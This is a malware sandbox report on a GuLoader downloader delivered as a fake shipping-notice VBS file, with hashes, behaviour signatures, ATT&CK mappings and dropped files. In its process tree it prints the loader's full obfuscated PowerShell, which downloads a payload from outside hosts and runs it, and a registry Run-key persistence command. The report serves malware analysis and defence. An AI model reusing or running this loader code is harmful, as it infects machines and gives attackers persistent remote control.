Overview

overview

10

Static

static

1

awb_shippi...B).vbs

windows7-x64

10

awb_shippi...B).vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    120s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20240611-en
  • resource tags

    arch:x64arch:x86image:win7-20240611-enlocale:en-usos:windows7-x64system
  • submitted
    26-06-2024 08:49

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    awb_shipping_post_26062024224782020031808174CN18240624000002624(991KB).vbs

  • Size

    187KB

  • MD5

    298320f7d69c921e9c7b012b9d5d1b18

  • SHA1

    fdd4a9fb56b627744d813803fb98bbf741c32b36

  • SHA256

    5ff48cae59e91a2c7cdeb79cecf1c55395eb97c78792dd0447ba43595510f219

  • SHA512

    cb7648d505a222fcac46a4c20ed503bf6f168f7b321676f0fa6a99d7c8bf97a122965a460ea8d62efeed918e3a816c968a8e6e787abf8a66fb789b521a538457

  • SSDEEP

    3072:3mN8GGebKjeK3ubth+DCFxKCvBB/WnHPP1w/sLJFJ281QIHz1y8mNy7Ey1MgKTZi:308GxbKja3+DCbKCvBB/WnHXC/sLJFJb

Score
10/10
guloaderdownloaderpersistence

Malware Config

Signatures

  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

    downloaderguloader
  • Blocklisted process makes network request 6 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\awb_shipping_post_26062024224782020031808174CN18240624000002624(991KB).vbs"
    1⤵
    • Blocklisted process makes network request
    • Suspicious use of WriteProcessMemory
    PID:2208
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Probabl Prothallus Eparchs Bilkirkegaarde Galdesyges Halibut Receptionschefers Programnrt Jordfordelingers Gentofte havanese Ancillae groundhog Orsino aneurilemmic Sponsores Orv Suwe Elorgelets Millionvises Hypochnus Djvelskaben Lejekasernerne Bargander Probabl Prothallus Eparchs Bilkirkegaarde Galdesyges Halibut Receptionschefers Programnrt Jordfordelingers Gentofte havanese Ancillae groundhog Orsino aneurilemmic Sponsores Orv Suwe Elorgelets Millionvises Hypochnus Djvelskaben Lejekasernerne Bargander';$Dominikanermunkene = 1;Function Hierarchist($ydrelrens){$Rendegarnet=$ydrelrens.Length-$Dominikanermunkene;$Confessionals='SUBSTRIN';$Confessionals+='G';For( $Pupperne=1;$Pupperne -lt $Rendegarnet;$Pupperne+=2){$Probabl+=$ydrelrens.$Confessionals.Invoke( $Pupperne, $Dominikanermunkene);}$Probabl;}function Fjollehovedernes($thiophenic){ & ($Kirkebgerne) ($thiophenic);}$Hemmeligholder78=Hierarchist 'MM o.zOiglbl a /N5D..0, K(PW.iPn dFo w sA .NOT ,1 0 .I0 ;. .WFi,nT6.4D;, FxS6T4 ;. r,vS: 1r2M1P.W0 )W .G eIcSk o,/ 2A0K1S0 0 1P0,1W FFi rSeGfPoIx /H1 2 1 . 0O ';$Varnishment=Hierarchist 'SUAsHeMr -aA gRe n t ';$Galdesyges=Hierarchist ',h t t pWs : / / eCv,o.l uAxHc obnAtMaRbkialSiUd aSdNe,. c oSmY.,b rK/.p,tGs /CS,oDuMrDcAeAfNi.lMe rE7R4 .et opcr>LhAtCtDp : /F/S9 4W.Q1U5,6S. 8 .S8 8M/IStoSuKr,c.e.fSi,l eOrI7P4P. t o c ';$Sphakiot=Hierarchist ',>, ';$Kirkebgerne=Hierarchist 'Riee x. ';$Forpraktikanters73='Programnrt';$Brsnoteringens = Hierarchist 'Ne.cIhFoB % aFp pKdHa,t,a.%.\ FToUrSmTaTt,l i nBiFe t,e g nPsF1 9D1S. BBj e B&.&F PeVc,hSo, tg ';Fjollehovedernes (Hierarchist 'M$RgUlTo bBa lF:,G l y,c,oApoe xFi.aA= (RcIm dE ./FcA E$ BSr s.n.oPt,eRrgi nTgSe nMs )O ');Fjollehovedernes (Hierarchist ',$hgSl ofbNa l :DBRi lSk i rDk.e,g.aPa,rid e =B$.GVaNlAdDeMsTyRgSe,s .WsGp lDiRt ( $KS,pahBa.kJiFoStC) ');Fjollehovedernes (Hierarchist 'U[SNFe tH.SS,e rKvNiFcHegPUo,i,nEtDMIaDnHaUgAeIr ],:a: S e c u.rVibt.yCP r oAt oVc,oAlG =F [.NAePtd.,S.e cTuRrQi,t,y.Plr o t o.c o.lTT ySpSe ] :.:KTGlPsf1 2D ');$Galdesyges=$Bilkirkegaarde[0];$Modviljer= (Hierarchist 'R$SgMl o bCa l :FO.m pToUsAtMeFr,eN= NFe w.-EOUbWjOe.cEtE .Scy.sBt.e me..NReSt . W.e bVCClPi eMn t');$Modviljer+=$Glycopexia[1];Fjollehovedernes ($Modviljer);Fjollehovedernes (Hierarchist 'O$DO,m p oMsKt.eMr,eR. HPeDa dBeAras,[A$AV,aBr n,iTsBh,mAeSn.tP]B=O$AH.e.mRmSe lEiKg,hVoOl dUeDrF7U8 ');$Atomlaeren=Hierarchist 'D$ Onm,pDoHs tEe rFeH.,DMoNwSn,l,o.a dkFfirl eM( $.GBaMl,dAeRsBy gHe s,,I$,D jSv eMl,slkRa b.eSn )G ';$Djvelskaben=$Glycopexia[0];Fjollehovedernes (Hierarchist 'P$ gNlAo bCa lR: H aHw a.i,iBt,eB=.(,T eTsCt -APMaCtRhN B$.D.jAvOe l.sUk aMb eSnM)J ');while (!$Hawaiite) {Fjollehovedernes (Hierarchist 'G$.gtl,o b,a l :AT uAbTmUaPkGe.r =,$ tNr u.eL ') ;Fjollehovedernes $Atomlaeren;Fjollehovedernes (Hierarchist 'TS.tGa rCt -SSUlSe e p. N4, ');Fjollehovedernes (Hierarchist 'O$.gGl o bDa l.:NH aDw a i i.t e =.(,TSe.s,tA-RP,a.tHh $.D jIvSe l s.k,a,bAeHn )S ') ;Fjollehovedernes (Hierarchist 'R$ gUl o bCa lH:.E.p aJrFcShPsP=R$HgClso,b a lP:NPCrOo t h a lPl.uHs +.+S%.$MBSi lRkHi r k.eRgAa.aArbdSeT. caoNu nCtU ') ;$Galdesyges=$Bilkirkegaarde[$Eparchs];}$Nitrobacteria=349055;$kvindeskdene=24078;Fjollehovedernes (Hierarchist 'F$bgBlBo bbaDl :FJMo r d f.o r d,eTl i nTg.e,r,sS F= GAe tA-,CRoUn t e n t. $ D j v.e lTsJk.a b eFnF ');Fjollehovedernes (Hierarchist '.$Bg.l o,bpa lR: GTaHmPp hErFeTl =Z L[ SdySs tVe,m..OCmoBnFv e.r,t.]P:U:.Fkr o.mFB afs e 6R4,STt r iAn g.( $MJMoIr dBfFo r dde lIi n gEe.r,sG) ');Fjollehovedernes (Hierarchist ' $fgBl o bAa l.: A nDc.iVl lRaieN S= L[.S yOsntBeSmK..TAeLx t .,EEn cCo.dWiNnLg ]h:,:hA SHCPI,IU.SG e tSS t,r i n g,( $ GBaZm.pShHrTe,l ), ');Fjollehovedernes (Hierarchist ' $ gIl oTbFaBlF: V,aOr.mDeFpSu.dLe,sT7T8,=,$,Aan cEiEl.lSa,eF..sUuMbTs t rOiDn g (D$SNAi,tSrHo bTa,cSt,e r iFaH,,$Sk v iHn dReCsFk d eMn eS)N ');Fjollehovedernes $Varmepudes78;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2720
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Formatlinietegns191.Bje && echo t"
        3⤵
          PID:2756
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Probabl Prothallus Eparchs Bilkirkegaarde Galdesyges Halibut Receptionschefers Programnrt Jordfordelingers Gentofte havanese Ancillae groundhog Orsino aneurilemmic Sponsores Orv Suwe Elorgelets Millionvises Hypochnus Djvelskaben Lejekasernerne Bargander Probabl Prothallus Eparchs Bilkirkegaarde Galdesyges Halibut Receptionschefers Programnrt Jordfordelingers Gentofte havanese Ancillae groundhog Orsino aneurilemmic Sponsores Orv Suwe Elorgelets Millionvises Hypochnus Djvelskaben Lejekasernerne Bargander';$Dominikanermunkene = 1;Function Hierarchist($ydrelrens){$Rendegarnet=$ydrelrens.Length-$Dominikanermunkene;$Confessionals='SUBSTRIN';$Confessionals+='G';For( $Pupperne=1;$Pupperne -lt $Rendegarnet;$Pupperne+=2){$Probabl+=$ydrelrens.$Confessionals.Invoke( $Pupperne, $Dominikanermunkene);}$Probabl;}function Fjollehovedernes($thiophenic){ & ($Kirkebgerne) ($thiophenic);}$Hemmeligholder78=Hierarchist 'MM o.zOiglbl a /N5D..0, K(PW.iPn dFo w sA .NOT ,1 0 .I0 ;. .WFi,nT6.4D;, FxS6T4 ;. r,vS: 1r2M1P.W0 )W .G eIcSk o,/ 2A0K1S0 0 1P0,1W FFi rSeGfPoIx /H1 2 1 . 0O ';$Varnishment=Hierarchist 'SUAsHeMr -aA gRe n t ';$Galdesyges=Hierarchist ',h t t pWs : / / eCv,o.l uAxHc obnAtMaRbkialSiUd aSdNe,. c oSmY.,b rK/.p,tGs /CS,oDuMrDcAeAfNi.lMe rE7R4 .et opcr>LhAtCtDp : /F/S9 4W.Q1U5,6S. 8 .S8 8M/IStoSuKr,c.e.fSi,l eOrI7P4P. t o c ';$Sphakiot=Hierarchist ',>, ';$Kirkebgerne=Hierarchist 'Riee x. ';$Forpraktikanters73='Programnrt';$Brsnoteringens = Hierarchist 'Ne.cIhFoB % aFp pKdHa,t,a.%.\ FToUrSmTaTt,l i nBiFe t,e g nPsF1 9D1S. BBj e B&.&F PeVc,hSo, tg ';Fjollehovedernes (Hierarchist 'M$RgUlTo bBa lF:,G l y,c,oApoe xFi.aA= (RcIm dE ./FcA E$ BSr s.n.oPt,eRrgi nTgSe nMs )O ');Fjollehovedernes (Hierarchist ',$hgSl ofbNa l :DBRi lSk i rDk.e,g.aPa,rid e =B$.GVaNlAdDeMsTyRgSe,s .WsGp lDiRt ( $KS,pahBa.kJiFoStC) ');Fjollehovedernes (Hierarchist 'U[SNFe tH.SS,e rKvNiFcHegPUo,i,nEtDMIaDnHaUgAeIr ],:a: S e c u.rVibt.yCP r oAt oVc,oAlG =F [.NAePtd.,S.e cTuRrQi,t,y.Plr o t o.c o.lTT ySpSe ] :.:KTGlPsf1 2D ');$Galdesyges=$Bilkirkegaarde[0];$Modviljer= (Hierarchist 'R$SgMl o bCa l :FO.m pToUsAtMeFr,eN= NFe w.-EOUbWjOe.cEtE .Scy.sBt.e me..NReSt . W.e bVCClPi eMn t');$Modviljer+=$Glycopexia[1];Fjollehovedernes ($Modviljer);Fjollehovedernes (Hierarchist 'O$DO,m p oMsKt.eMr,eR. HPeDa dBeAras,[A$AV,aBr n,iTsBh,mAeSn.tP]B=O$AH.e.mRmSe lEiKg,hVoOl dUeDrF7U8 ');$Atomlaeren=Hierarchist 'D$ Onm,pDoHs tEe rFeH.,DMoNwSn,l,o.a dkFfirl eM( $.GBaMl,dAeRsBy gHe s,,I$,D jSv eMl,slkRa b.eSn )G ';$Djvelskaben=$Glycopexia[0];Fjollehovedernes (Hierarchist 'P$ gNlAo bCa lR: H aHw a.i,iBt,eB=.(,T eTsCt -APMaCtRhN B$.D.jAvOe l.sUk aMb eSnM)J ');while (!$Hawaiite) {Fjollehovedernes (Hierarchist 'G$.gtl,o b,a l :AT uAbTmUaPkGe.r =,$ tNr u.eL ') ;Fjollehovedernes $Atomlaeren;Fjollehovedernes (Hierarchist 'TS.tGa rCt -SSUlSe e p. N4, ');Fjollehovedernes (Hierarchist 'O$.gGl o bDa l.:NH aDw a i i.t e =.(,TSe.s,tA-RP,a.tHh $.D jIvSe l s.k,a,bAeHn )S ') ;Fjollehovedernes (Hierarchist 'R$ gUl o bCa lH:.E.p aJrFcShPsP=R$HgClso,b a lP:NPCrOo t h a lPl.uHs +.+S%.$MBSi lRkHi r k.eRgAa.aArbdSeT. caoNu nCtU ') ;$Galdesyges=$Bilkirkegaarde[$Eparchs];}$Nitrobacteria=349055;$kvindeskdene=24078;Fjollehovedernes (Hierarchist 'F$bgBlBo bbaDl :FJMo r d f.o r d,eTl i nTg.e,r,sS F= GAe tA-,CRoUn t e n t. $ D j v.e lTsJk.a b eFnF ');Fjollehovedernes (Hierarchist '.$Bg.l o,bpa lR: GTaHmPp hErFeTl =Z L[ SdySs tVe,m..OCmoBnFv e.r,t.]P:U:.Fkr o.mFB afs e 6R4,STt r iAn g.( $MJMoIr dBfFo r dde lIi n gEe.r,sG) ');Fjollehovedernes (Hierarchist ' $fgBl o bAa l.: A nDc.iVl lRaieN S= L[.S yOsntBeSmK..TAeLx t .,EEn cCo.dWiNnLg ]h:,:hA SHCPI,IU.SG e tSS t,r i n g,( $ GBaZm.pShHrTe,l ), ');Fjollehovedernes (Hierarchist ' $ gIl oTbFaBlF: V,aOr.mDeFpSu.dLe,sT7T8,=,$,Aan cEiEl.lSa,eF..sUuMbTs t rOiDn g (D$SNAi,tSrHo bTa,cSt,e r iFaH,,$Sk v iHn dReCsFk d eMn eS)N ');Fjollehovedernes $Varmepudes78;"
          3⤵
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2612
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Formatlinietegns191.Bje && echo t"
            4⤵
              PID:2932
            • C:\Program Files (x86)\windows mail\wab.exe
              "C:\Program Files (x86)\windows mail\wab.exe"
              4⤵
              • Suspicious use of NtCreateThreadExHideFromDebugger
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious use of WriteProcessMemory
              PID:2416
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Soget" /t REG_EXPAND_SZ /d "%Equiexcellency% -w 1 $Neosorex38=(Get-ItemProperty -Path 'HKCU:\Submicron\').Velkommenteret;%Equiexcellency% ($Neosorex38)"
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:632
                • C:\Windows\SysWOW64\reg.exe
                  REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Soget" /t REG_EXPAND_SZ /d "%Equiexcellency% -w 1 $Neosorex38=(Get-ItemProperty -Path 'HKCU:\Submicron\').Velkommenteret;%Equiexcellency% ($Neosorex38)"
                  6⤵
                  • Adds Run key to start application
                  • Modifies registry key
                  PID:1484

      Network

      MITRE ATT&CK Matrix ATT&CK v13

      Initial Access

      Execution

      Persistence

      Boot or Logon Autostart Execution

      1
      T1547

      Registry Run Keys / Startup Folder

      1
      T1547.001

      Privilege Escalation

      Boot or Logon Autostart Execution

      1
      T1547

      Registry Run Keys / Startup Folder

      1
      T1547.001

      Defense Evasion

      Modify Registry

      2
      T1112

      Credential Access

      Discovery

      System Information Discovery

      1
      T1082

      Lateral Movement

      Collection

      Exfiltration

      Command and Control

      Impact

      Resource Development

      Reconnaissance

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\Cab24B2.tmp
        Filesize

        70KB

        MD5

        49aebf8cbd62d92ac215b2923fb1b9f5

        SHA1

        1723be06719828dda65ad804298d0431f6aff976

        SHA256

        b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

        SHA512

        bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

        Download Submit
      • C:\Users\Admin\AppData\Roaming\Formatlinietegns191.Bje
        Filesize

        485KB

        MD5

        a06cda7715f697b502cf2db6c0bc524d

        SHA1

        16e24c924410364f27ca71379a7ddd5a779515ab

        SHA256

        a26c5b23d59eedc0449343dcf11a6498174ccf1a4b5d25e925143a01f87a0f45

        SHA512

        aaa84f6b760d409437593123196205a500eb5f05c3e9da3f155b843c2db01b25d5d0f31f80f72a493e5a58fcb4e8b31bb4efb89467a7ddf76769dac6416e50ba

        Download Submit
      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\VAR3BKX1JYKAMX18UJ4N.temp
        Filesize

        7KB

        MD5

        8b20d7383d64196962b54ee907b46056

        SHA1

        898b353c7eecc6710f53a1a83981cc163d322fd8

        SHA256

        3b1b454d9780fccc4228fc4ff0488169e138e01f87e66fbee0d94276963f2641

        SHA512

        a647cd6d9ebc6695567f38f47be9aa785e81d08d9abb857f8fa680cb833d76c06f61fdf92d77217eb029015810d4da22406633282ee07bdc109b6dfaf8c283bf

        Download Submit
      • memory/2416-40-0x0000000001A90000-0x000000000593B000-memory.dmp
        Filesize

        62.7MB

        Download
      • memory/2416-38-0x0000000000A20000-0x0000000001A82000-memory.dmp
        Filesize

        16.4MB

        Download
      • memory/2612-35-0x0000000006660000-0x000000000A50B000-memory.dmp
        Filesize

        62.7MB

        Download
      • memory/2720-27-0x000007FEF4A10000-0x000007FEF53AD000-memory.dmp
        Filesize

        9.6MB

        Download
      • memory/2720-26-0x000007FEF4A10000-0x000007FEF53AD000-memory.dmp
        Filesize

        9.6MB

        Download
      • memory/2720-25-0x000007FEF4A10000-0x000007FEF53AD000-memory.dmp
        Filesize

        9.6MB

        Download
      • memory/2720-24-0x000007FEF4A10000-0x000007FEF53AD000-memory.dmp
        Filesize

        9.6MB

        Download
      • memory/2720-23-0x000007FEF4A10000-0x000007FEF53AD000-memory.dmp
        Filesize

        9.6MB

        Download
      • memory/2720-33-0x000007FEF4A10000-0x000007FEF53AD000-memory.dmp
        Filesize

        9.6MB

        Download
      • memory/2720-34-0x000007FEF4CCE000-0x000007FEF4CCF000-memory.dmp
        Filesize

        4KB

        Download
      • memory/2720-22-0x00000000028E0000-0x00000000028E8000-memory.dmp
        Filesize

        32KB

        Download
      • memory/2720-21-0x000000001B5D0000-0x000000001B8B2000-memory.dmp
        Filesize

        2.9MB

        Download
      • memory/2720-20-0x000007FEF4CCE000-0x000007FEF4CCF000-memory.dmp
        Filesize

        4KB

        Download
      • memory/2720-43-0x000007FEF4A10000-0x000007FEF53AD000-memory.dmp
        Filesize

        9.6MB

        Download